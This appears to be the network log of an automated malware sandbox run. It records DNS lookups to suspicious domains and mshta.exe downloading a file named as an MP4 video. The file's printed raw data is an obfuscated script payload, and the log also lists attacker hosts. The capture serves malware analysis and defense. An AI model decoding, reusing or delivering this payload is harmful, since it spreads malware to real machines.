                                                                                    Dec 17, 2024 08:38:45.370461941 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.370598078 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.370620966 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.370873928 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.377974033 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.377993107 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.378037930 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.378055096 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.378078938 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.378118992 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.520131111 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.520158052 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.520278931 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.520278931 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.520299911 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.520658970 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.527683020 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.527714014 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.527796030 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.527806044 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.527823925 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.528042078 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.534140110 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.534158945 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.534241915 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.534251928 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.535376072 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.541532040 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.541551113 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.541620016 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.541630030 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.542484999 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.549031019 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.549057007 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.550314903 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.550349951 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.553801060 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.555979013 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.555998087 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.556071043 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.556080103 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.556538105 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.563513041 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.563532114 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.563631058 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.563642025 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.564006090 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.569948912 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.569964886 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.570055008 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.570061922 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.574040890 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.712449074 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.712471008 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.712569952 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.712594032 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.712956905 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.719794989 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.719816923 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.720004082 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.720027924 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.720458031 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.726433992 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.726460934 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.726641893 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.726658106 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.727093935 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.733875990 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.733906031 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.734278917 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.734292030 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.734515905 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.741322041 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.741348028 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.741506100 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.741534948 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.741763115 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.748240948 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.748261929 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.748339891 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.748357058 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.750787020 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.755727053 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.755744934 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.755932093 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.755953074 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.757420063 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.760031939 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.760071993 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.760099888 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.760109901 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.761104107 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.901762962 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.901789904 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.901902914 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.901921988 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.901962042 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.902148008 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.908751011 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.908771038 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.908863068 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.908875942 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.909002066 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.916322947 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.916343927 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.916475058 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.916475058 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.916487932 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.916687012 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.922878981 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.922904968 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.923022032 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.923022985 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.923036098 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.923121929 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.930345058 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.930371046 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.930430889 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.930455923 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.930632114 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.937488079 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.937511921 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.937627077 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.937627077 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.937644005 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.937714100 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:46.297589064 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:46.297637939 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:46.297883034 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:46.297915936 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:46.297981977 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:46.298857927 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:46.298875093 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:46.298947096 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:46.298954964 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:46.299041033 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:46.306042910 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:46.306061029 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:46.306191921 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:46.306201935 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:46.306243896 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:46.306243896 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:46.306572914 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:46.306588888 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:46.306643009 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:46.306648970 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:46.306668043 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:46.306715965 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:46.307548046 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:46.307563066 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:46.307646036 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:46.307646036 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:46.307662010 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:46.307909966 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:46.308576107 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:46.308590889 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:46.308686018 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:46.308686018 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:46.308696032 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:46.308756113 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:46.310086966 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:46.310101986 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:46.310147047 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:46.310170889 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:46.310178995 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:46.310209990 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:46.310276985 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:46.310930967 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:46.310945988 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:46.311003923 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:46.311009884 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:46.311053991 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:46.313411951 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:46.313430071 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:46.313517094 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:46.313524961 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:46.313539982 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:46.320086002 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:46.320101976 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:46.320194960 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:46.320194960 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:46.320221901 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:46.321082115 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:46.321099043 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:46.321176052 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:46.321176052 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:46.321187019 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:46.321985960 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:46.322000027 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:46.322068930 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:46.322077990 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:46.322077990 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:46.322096109 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:46.322139025 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:46.322144032 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:46.322180033 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:46.322544098 CET49713443192.168.2.10172.67.140.151
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Dec 17, 2024 08:38:15.770435095 CET5558953192.168.2.101.1.1.1
                                                                                    Dec 17, 2024 08:38:16.095487118 CET53555891.1.1.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:20.644593000 CET5212753192.168.2.101.1.1.1
                                                                                    Dec 17, 2024 08:38:20.860572100 CET53521271.1.1.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:23.006768942 CET6453753192.168.2.101.1.1.1
                                                                                    Dec 17, 2024 08:38:23.336206913 CET53645371.1.1.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:33.048069954 CET6245953192.168.2.101.1.1.1
                                                                                    Dec 17, 2024 08:38:46.389585018 CET5814153192.168.2.101.1.1.1
                                                                                    Dec 17, 2024 08:39:00.123339891 CET5944953192.168.2.101.1.1.1
                                                                                    Dec 17, 2024 08:39:24.202352047 CET5719153192.168.2.101.1.1.1
                                                                                    Dec 17, 2024 08:39:48.279252052 CET5533253192.168.2.101.1.1.1
                                                                                    Dec 17, 2024 08:40:12.435816050 CET5876853192.168.2.101.1.1.1
                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Dec 17, 2024 08:38:15.770435095 CET192.168.2.101.1.1.10x185dStandard query (0)static.klipxuhaq.shopA (IP address)IN (0x0001)false
                                                                                    Dec 17, 2024 08:38:20.644593000 CET192.168.2.101.1.1.10x3a39Standard query (0)qu.axA (IP address)IN (0x0001)false
                                                                                    Dec 17, 2024 08:38:23.006768942 CET192.168.2.101.1.1.10x38f8Standard query (0)denek.local-wanderer.shopA (IP address)IN (0x0001)false
                                                                                    Dec 17, 2024 08:38:33.048069954 CET192.168.2.101.1.1.10x2ab7Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                    Dec 17, 2024 08:38:46.389585018 CET192.168.2.101.1.1.10x6646Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                    Dec 17, 2024 08:39:00.123339891 CET192.168.2.101.1.1.10x66f4Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                    Dec 17, 2024 08:39:24.202352047 CET192.168.2.101.1.1.10x42ecStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                    Dec 17, 2024 08:39:48.279252052 CET192.168.2.101.1.1.10x547aStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                    Dec 17, 2024 08:40:12.435816050 CET192.168.2.101.1.1.10x1b8cStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Dec 17, 2024 08:38:16.095487118 CET1.1.1.1192.168.2.100x185dNo error (0)static.klipxuhaq.shop104.21.48.1A (IP address)IN (0x0001)false
                                                                                    Dec 17, 2024 08:38:16.095487118 CET1.1.1.1192.168.2.100x185dNo error (0)static.klipxuhaq.shop104.21.80.1A (IP address)IN (0x0001)false
                                                                                    Dec 17, 2024 08:38:16.095487118 CET1.1.1.1192.168.2.100x185dNo error (0)static.klipxuhaq.shop104.21.16.1A (IP address)IN (0x0001)false
                                                                                    Dec 17, 2024 08:38:16.095487118 CET1.1.1.1192.168.2.100x185dNo error (0)static.klipxuhaq.shop104.21.32.1A (IP address)IN (0x0001)false
                                                                                    Dec 17, 2024 08:38:16.095487118 CET1.1.1.1192.168.2.100x185dNo error (0)static.klipxuhaq.shop104.21.64.1A (IP address)IN (0x0001)false
                                                                                    Dec 17, 2024 08:38:16.095487118 CET1.1.1.1192.168.2.100x185dNo error (0)static.klipxuhaq.shop104.21.96.1A (IP address)IN (0x0001)false
                                                                                    Dec 17, 2024 08:38:16.095487118 CET1.1.1.1192.168.2.100x185dNo error (0)static.klipxuhaq.shop104.21.112.1A (IP address)IN (0x0001)false
                                                                                    Dec 17, 2024 08:38:20.860572100 CET1.1.1.1192.168.2.100x3a39No error (0)qu.ax188.245.211.225A (IP address)IN (0x0001)false
                                                                                    Dec 17, 2024 08:38:23.336206913 CET1.1.1.1192.168.2.100x38f8No error (0)denek.local-wanderer.shop172.67.140.151A (IP address)IN (0x0001)false
                                                                                    Dec 17, 2024 08:38:23.336206913 CET1.1.1.1192.168.2.100x38f8No error (0)denek.local-wanderer.shop104.21.73.48A (IP address)IN (0x0001)false
                                                                                    Dec 17, 2024 08:38:32.203012943 CET1.1.1.1192.168.2.100x2af2No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                    Dec 17, 2024 08:38:32.203012943 CET1.1.1.1192.168.2.100x2af2No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                    Dec 17, 2024 08:38:33.279089928 CET1.1.1.1192.168.2.100x2ab7No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                    Dec 17, 2024 08:38:46.530282021 CET1.1.1.1192.168.2.100x6646No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                    Dec 17, 2024 08:39:00.346393108 CET1.1.1.1192.168.2.100x66f4No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                    Dec 17, 2024 08:39:24.432884932 CET1.1.1.1192.168.2.100x42ecNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                    Dec 17, 2024 08:39:48.492252111 CET1.1.1.1192.168.2.100x547aNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                    Dec 17, 2024 08:40:12.670053005 CET1.1.1.1192.168.2.100x1b8cNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                    • static.klipxuhaq.shop
                                                                                    • qu.ax
                                                                                    • denek.local-wanderer.shop
                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.1049707104.21.48.14436252C:\Windows\System32\mshta.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-12-17 07:38:17 UTC334OUTGET /BUX6P.mp4 HTTP/1.1
                                                                                    Accept: */*
                                                                                    Accept-Language: en-CH
                                                                                    UA-CPU: AMD64
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                    Host: static.klipxuhaq.shop
                                                                                    Connection: Keep-Alive
                                                                                    2024-12-17 07:38:17 UTC915INHTTP/1.1 200 OK
                                                                                    Date: Tue, 17 Dec 2024 07:38:17 GMT
                                                                                    Content-Type: video/mp4
                                                                                    Content-Length: 340566
                                                                                    Connection: close
                                                                                    Accept-Ranges: bytes
                                                                                    ETag: "0482adc1dd52998e62ba661eba48b282"
                                                                                    Last-Modified: Sun, 15 Dec 2024 09:49:50 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8NIGo8KSfUhH6y7C4HG4r0KBQ%2Bvgs9vIMZhQahoLtMizYKyAMwBQahLikM5Erfx9aDyMkN%2Btbb4qq558H9MlP0mSY1u%2F90Lj12dKiW%2BaqqoGS8dqthdqctp%2BqT5MLb09%2Bd7kW7e5h4g%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8f3540b429cdc323-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1449&min_rtt=1439&rtt_var=561&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2871&recv_bytes=916&delivery_rate=1916010&cwnd=214&unsent_bytes=0&cid=bb7dfa9ef7ff3383&ts=657&x=0"
                                                                                    2024-12-17 07:38:17 UTC1369INData Raw: 36 36 4e 37 35 54 36 65 76 36 33 6a 37 34 41 36 39 56 36 66 7a 36 65 56 32 30 77 36 37 4d 36 31 74 36 66 6f 35 39 55 36 33 70 32 38 74 36 36 77 36 65 75 34 34 77 37 37 70 34 35 4b 35 30 66 32 39 70 37 62 4b 37 36 66 36 31 53 37 32 44 32 30 57 34 39 57 36 37 42 36 33 50 34 64 52 34 39 53 33 64 78 32 30 79 32 37 4c 32 37 4a 33 62 4d 36 36 78 36 66 63 37 32 71 32 30 4a 32 38 6f 37 36 44 36 31 73 37 32 68 32 30 72 34 62 54 34 31 4f 34 36 44 36 31 49 32 30 55 33 64 50 32 30 59 33 30 54 33 62 4b 34 62 59 34 31 49 34 36 51 36 31 51 32 30 78 33 63 7a 32 30 64 36 36 54 36 65 68 34 34 75 37 37 62 34 35 71 35 30 57 32 65 65 36 63 6b 36 35 6b 36 65 78 36 37 55 37 34 7a 36 38 41 33 62 72 32 30 6c 34 62 53 34 31 78 34 36 62 36 31 6b 32 62 48 32 62 54 32 39 74 37 62 76
                                                                                    Data Ascii: 66N75T6ev63j74A69V6fz6eV20w67M61t6fo59U63p28t66w6eu44w77p45K50f29p7bK76f61S72D20W49W67B63P4dR49S3dx20y27L27J3bM66x6fc72q20J28o76D61s72h20r4bT41O46D61I20U3dP20Y30T3bK4bY41I46Q61Q20x3cz20d66T6eh44u77b45q50W2ee6ck65k6ex67U74z68A3br20l4bS41x46b61k2bH2bT29t7bv
                                                                                    2024-12-17 07:38:17 UTC1369INData Raw: 31 4d 32 63 62 33 33 44 33 30 48 33 32 67 32 63 51 33 32 42 33 39 5a 33 39 4c 32 63 70 33 32 70 33 39 65 33 35 48 32 63 47 33 32 58 33 31 72 33 37 4c 32 63 59 33 32 45 33 33 77 33 30 51 32 63 4f 33 33 46 33 30 64 33 30 4b 32 63 78 33 32 48 33 39 70 33 37 6d 32 63 43 33 32 74 33 39 54 33 33 5a 32 63 68 33 32 71 33 39 50 33 30 44 32 63 6f 33 33 62 33 30 65 33 31 66 32 63 45 33 32 63 33 31 46 33 37 7a 32 63 4b 33 32 55 33 32 42 33 35 77 32 63 6a 33 32 6e 33 32 64 33 31 58 32 63 71 33 32 72 33 35 79 33 30 56 32 63 5a 33 33 78 33 30 6a 33 32 4a 32 63 4c 33 33 6e 33 30 49 33 35 76 32 63 56 33 32 45 33 36 61 33 37 51 32 63 49 33 32 6e 33 36 58 33 38 78 32 63 61 33 32 51 33 31 4d 33 37 6d 32 63 41 33 32 64 33 33 41 33 30 64 32 63 47 33 32 74 33 39 43 33 39 50 32
                                                                                    Data Ascii: 1M2cb33D30H32g2cQ32B39Z39L2cp32p39e35H2cG32X31r37L2cY32E33w30Q2cO33F30d30K2cx32H39p37m2cC32t39T33Z2ch32q39P30D2co33b30e31f2cE32c31F37z2cK32U32B35w2cj32n32d31X2cq32r35y30V2cZ33x30j32J2cL33n30I35v2cV32E36a37Q2cI32n36X38x2ca32Q31M37m2cA32d33A30d2cG32t39C39P2
